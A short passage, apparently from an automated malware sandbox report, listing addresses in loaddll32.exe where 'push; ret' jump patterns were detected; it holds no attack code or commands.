Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_004143CF push 004144A8h; ret | 0_2_004144A0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0041447C push 004144A8h; ret | 0_2_004144A0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00428404 push 0042845Dh; ret | 0_2_00428455 |
Source: C:\Windows\ |